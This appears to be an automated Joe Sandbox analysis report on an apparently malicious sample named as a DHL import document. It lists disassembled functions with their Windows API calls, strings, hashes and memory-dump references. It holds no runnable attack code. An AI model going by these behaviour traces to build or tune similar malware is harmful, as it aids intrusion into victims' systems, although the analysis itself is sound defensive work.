Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 54e6507f85df1bfcb369cc11cab58f723424881b553f0e52a1ea0db3d8e9d6ce
Instruction ID: 8d48f9bfdabd2b8bad16b5a6ea60ef4d359d6d4c195a7deb5ab7bfa5a118ad23
Opcode Fuzzy Hash: 54e6507f85df1bfcb369cc11cab58f723424881b553f0e52a1ea0db3d8e9d6ce
Instruction Fuzzy Hash: E311BE31500605FFDB149FA4DC49BEE7FB9FB41359F104028F44597210D735A988EB68

Function 005414CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005414FF
OpenProcessToken.ADVAPI32(00000000), ref: 00541506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00541515
CloseHandle.KERNEL32(00000004), ref: 00541520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0054154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00541563

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 56bef0238e631dcde02b7be797c92c60d23e53983d915a27eb2d9e2d4aff94b8
Instruction ID: 5c920ebfeec57ec3084e67c27a701b32a61268cf725bd1f3e99109b94a57ea2b
Opcode Fuzzy Hash: 56bef0238e631dcde02b7be797c92c60d23e53983d915a27eb2d9e2d4aff94b8
Instruction Fuzzy Hash: B611F972501209ABDF118F98ED49FDE7FA9FF48748F044059FA09A2160C3758EA5EB64

Function 00503382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00503379,00502FE5), ref: 00503390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0050339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005033B7
SetLastError.KERNEL32(00000000,?,00503379,00502FE5), ref: 00503409

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d3906ae8b19387fd840ab1190eb0b04633e1f27afbc0a59cd1ef3ebb04aed05b
Instruction ID: fe2e099e9b58149c0ef9ec988f02334a142ac0509d7f170bd6522da3997742fe
Opcode Fuzzy Hash: d3906ae8b19387fd840ab1190eb0b04633e1f27afbc0a59cd1ef3ebb04aed05b
Instruction Fuzzy Hash: 2801D432609312BEEB2527747CCE6AF3E9CFB663797200629F611851F0FF225D49A644

Function 00512D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00515686,00523CD6,?,00000000,?,00515B6A,?,?,?,?,?,0050E6D1,?,005A8A48), ref: 00512D78
_free.LIBCMT ref: 00512DAB
_free.LIBCMT ref: 00512DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0050E6D1,?,005A8A48,00000010,004E4F4A,?,?,00000000,00523CD6), ref: 00512DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0050E6D1,?,005A8A48,00000010,004E4F4A,?,?,00000000,00523CD6), ref: 00512DEC
_abort.LIBCMT ref: 00512DF2

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 4c5ee1ea3400e8baad114acf3b6146bceffc33fc35cb6063be77037619c1fd6c
Instruction ID: 28dcc5b27ac2884275311b974de3ec920af072fc19dec680a0e5196bcfa19a54
Opcode Fuzzy Hash: 4c5ee1ea3400e8baad114acf3b6146bceffc33fc35cb6063be77037619c1fd6c
Instruction Fuzzy Hash: C4F0A9365446016BF7123738FC0EADB2D557BD2771F24081CF82D921D1EE3498E76160

Function 00578A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 004F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004F9693
Part of subcall function 004F9639: SelectObject.GDI32(?,00000000), ref: 004F96A2
Part of subcall function 004F9639: BeginPath.GDI32(?), ref: 004F96B9
Part of subcall function 004F9639: SelectObject.GDI32(?,00000000), ref: 004F96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00578A4E
LineTo.GDI32(?,00000003,00000000), ref: 00578A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00578A70
LineTo.GDI32(?,00000000,00000003), ref: 00578A80
EndPath.GDI32(?), ref: 00578A90
StrokePath.GDI32(?), ref: 00578AA0

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: e4eb58b3b3de334fbf47c09bd71c30598bc2d21185e6a04098dff1a98ead5978
Instruction ID: d1edc2b684fdb27d0677a784945e2c0cba92915f56fc0a9b5afee81409fbd37a
Opcode Fuzzy Hash: e4eb58b3b3de334fbf47c09bd71c30598bc2d21185e6a04098dff1a98ead5978
Instruction Fuzzy Hash: C1111E7604014CFFDF119F90EC48EAA7F6DEB14354F008056BA1995161C7719D99EFA0

Function 005451FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00545218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00545229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00545230
ReleaseDC.USER32(00000000,00000000), ref: 00545238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0054524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00545261

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7f9a5c6db92ea9a026ce9a3b8978ab55d6b5d95a77a9838033ae9f244748a8dd
Instruction ID: 2b9142ae933f8c7f80c8ff1989997c0105fccb538a4ca25f1c205c41ad239a93
Opcode Fuzzy Hash: 7f9a5c6db92ea9a026ce9a3b8978ab55d6b5d95a77a9838033ae9f244748a8dd
Instruction Fuzzy Hash: A5016275E04719BBEB109BA59C49E5EBFB8FF58751F04406AFA08A7281D6709C04DFA0

Function 004E1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 004E1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 004E1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004E1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004E1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 004E1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 004E1C22

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 6b4390028491c9e3db1340e280bbf05cd6006fa583b6608bc89ad30d1c923a47
Instruction ID: 2f1601e4a71d2921d8894917be9f89a99d074a5258efc542249a5b2f3e933da2
Opcode Fuzzy Hash: 6b4390028491c9e3db1340e280bbf05cd6006fa583b6608bc89ad30d1c923a47
Instruction Fuzzy Hash: BE016CB09027597DE3008F5A8C85B52FFA8FF19754F00411F915C4B941C7F5A864CBE5

Function 0054EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0054EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0054EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0054EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0054EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0054EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0054EB75

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 3e7f5a0440da5d75e90a79ec0a356d805f424fafb9c30e00e7d9dd80732985dd
Instruction ID: 57fa240b0895533b03eb6abb6416acf99d361d2575c9f92a3bceb047955c92f4
Opcode Fuzzy Hash: 3e7f5a0440da5d75e90a79ec0a356d805f424fafb9c30e00e7d9dd80732985dd
Instruction Fuzzy Hash: CCF09A72200118BBE7205B62AC0EEEF3E7CEFDAB11F00016CF605E1090D7A01A45EAB4

Function 00537439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00537452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00537469
GetWindowDC.USER32(?), ref: 00537475
GetPixel.GDI32(00000000,?,?), ref: 00537484
ReleaseDC.USER32(?,00000000), ref: 00537496
GetSysColor.USER32(00000005), ref: 005374B0

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 9dd9af66bec0c7191cc59e3758321c882d3d4709c1fc8e74b83fbe1337a019f4
Instruction ID: 87b78fb68420ebff45930a1a3e115674f1cb3a748b0f8c8d2ed88dcc5da0c07d
Opcode Fuzzy Hash: 9dd9af66bec0c7191cc59e3758321c882d3d4709c1fc8e74b83fbe1337a019f4
Instruction Fuzzy Hash: F001A231400209EFDB505F64EC08BA97FB5FF14311F500168F91AA20A0CB312E85FB10

Function 00541874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0054187F
UnloadUserProfile.USERENV(?,?), ref: 0054188B
CloseHandle.KERNEL32(?), ref: 00541894
CloseHandle.KERNEL32(?), ref: 0054189C
GetProcessHeap.KERNEL32(00000000,?), ref: 005418A5
HeapFree.KERNEL32(00000000), ref: 005418AC

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: f44b46847117606f905372da2e2a212ccf3e4a2bf613d02e22bcef7b3858b1ec
Instruction ID: 190277fa805949323966ccfa47e08a07e6ca8de4a41f59577b77f817dd31b44e
Opcode Fuzzy Hash: f44b46847117606f905372da2e2a212ccf3e4a2bf613d02e22bcef7b3858b1ec
Instruction Fuzzy Hash: FBE0E536004101BFEB015FA1FD0C90ABF39FF69B22B508628F22991470CB3294A4FF50

Function 004EBBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004EBEB3

Strings

D%[, xrefs: 004EBE9A
D%[, xrefs: 004EBDED, 004EBD91, 004EBD1B
D%[D%[, xrefs: 004EBCA5
D%[, xrefs: 004EBCA2

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%[$D%[$D%[$D%[D%[
API String ID: 1385522511-2673083169
Opcode ID: 4fa89b28336d08855c11a746b5729ab885ff65eeb6cec45d21617404c06073da
Instruction ID: 34517a2515b1372aeebf87bfb3da6620424addfc14de1fe74d6c1189ae58fd05
Opcode Fuzzy Hash: 4fa89b28336d08855c11a746b5729ab885ff65eeb6cec45d21617404c06073da
Instruction Fuzzy Hash: B1915A75A0424ACFCB14CF5AC490AABBBF1FF58311F24816ED941AB350D735A981CBD4

Function 00567B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00500242: EnterCriticalSection.KERNEL32(005B070C,005B1884,?,?,004F198B,005B2518,?,?,?,004E12F9,00000000), ref: 0050024D
Part of subcall function 00500242: LeaveCriticalSection.KERNEL32(005B070C,?,004F198B,005B2518,?,?,?,004E12F9,00000000), ref: 0050028A

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

Part of subcall function 005000A3: __onexit.LIBCMT ref: 005000A9

__Init_thread_footer.LIBCMT ref: 00567BFB

Part of subcall function 005001F8: EnterCriticalSection.KERNEL32(005B070C,?,?,004F8747,005B2514), ref: 00500202
Part of subcall function 005001F8: LeaveCriticalSection.KERNEL32(005B070C,?,004F8747,005B2514), ref: 00500235

Strings

5, xrefs: 00567C78
Variable must be of type 'Object'., xrefs: 00567C3A
+TS, xrefs: 00567E2E
G, xrefs: 00567C7F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +TS$5$G$Variable must be of type 'Object'.
API String ID: 535116098-1950097493
Opcode ID: f72b3a73d35d04b67dc7ad71f4a31c69727c7d5c1fef34bc1e7b381371c08e91
Instruction ID: f14a52b47fc90031b1458db911ba07cdab166b505c64353219895b71bb76f93e
Opcode Fuzzy Hash: f72b3a73d35d04b67dc7ad71f4a31c69727c7d5c1fef34bc1e7b381371c08e91
Instruction Fuzzy Hash: 93919A70A04209EFCB14EF54D8959BDBFB1FF48308F108499F816AB292DB31AE45DB51

Function 0054C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E7620: _wcslen.LIBCMT ref: 004E7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0054C6EE
_wcslen.LIBCMT ref: 0054C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0054C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0054C7CA

Strings

0, xrefs: 0054C6AF

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 1ca927c710de0d1cb37b1437a3b4e1ac01ebf77fd3b97fd3e76100f034fb2e59
Instruction ID: b5f2a2ff1f0716db47d08c188198702fcea64d865f943415166dfbc231edb36e
Opcode Fuzzy Hash: 1ca927c710de0d1cb37b1437a3b4e1ac01ebf77fd3b97fd3e76100f034fb2e59
Instruction Fuzzy Hash: EB51FF716063009BD7949F29C884AEB7FE8FFC9318F040A2DF995D31A0DB64E8089B56

Function 0056AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0056AEA3

Part of subcall function 004E7620: _wcslen.LIBCMT ref: 004E7625

GetProcessId.KERNEL32(00000000), ref: 0056AF38
CloseHandle.KERNEL32(00000000), ref: 0056AF67

Strings

<, xrefs: 0056AE6B
@, xrefs: 0056AE72

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 03814ce37b75ba963f05edeb3a86c25f37210904320b462b39af713e5a9ac7f7
Instruction ID: 0bfff92caa461a8cf782f572b0a41402efeaad886b7e19e6fae7cac6e6ce8f50
Opcode Fuzzy Hash: 03814ce37b75ba963f05edeb3a86c25f37210904320b462b39af713e5a9ac7f7
Instruction Fuzzy Hash: C7717570A006589FCB14EF66C484A9EBBF0BF08318F04849AE816AB392C735ED45CF91

Function 0054719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00547206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0054723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0054724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 005472CF

Strings

DllGetClassObject, xrefs: 00547242

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: c4e4e6a7543ea730604a19727272b97a1f3a730d63c527b133a129c0d1cf24f9
Instruction ID: 652293fd20a05cdfe085bdfd2ce87af3c1d5d219f8b3d75ac3d379e67109c8fa
Opcode Fuzzy Hash: c4e4e6a7543ea730604a19727272b97a1f3a730d63c527b133a129c0d1cf24f9
Instruction Fuzzy Hash: 4E4130756082089FDB15CF64C884ADA7FB9FF49314F1484ADBD099F20AD7B1DA44DBA0

Function 00573D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00573E35
IsMenu.USER32(?), ref: 00573E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00573E92
DrawMenuBar.USER32 ref: 00573EA5

Strings

0, xrefs: 00573D89

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 5dac0c38c0ac3dc7fd70d88f2283b0cc4c7aa2add23357d410a7eacd1c111363
Instruction ID: 326beb7d536c1200a7810f7dcb77e484479b4f18581ad019518bd971f4b0cc54
Opcode Fuzzy Hash: 5dac0c38c0ac3dc7fd70d88f2283b0cc4c7aa2add23357d410a7eacd1c111363
Instruction Fuzzy Hash: 74413C75A01209EFDB10DF50E884EAABBB9FF45364F048129FD0997250D731AE54EF50

Function 00541DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

Part of subcall function 00543CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00543CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00541E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00541E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00541EA9

Part of subcall function 004E6B57: _wcslen.LIBCMT ref: 004E6B6A

Strings

ListBox, xrefs: 00541E25
ComboBox, xrefs: 00541DF0

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
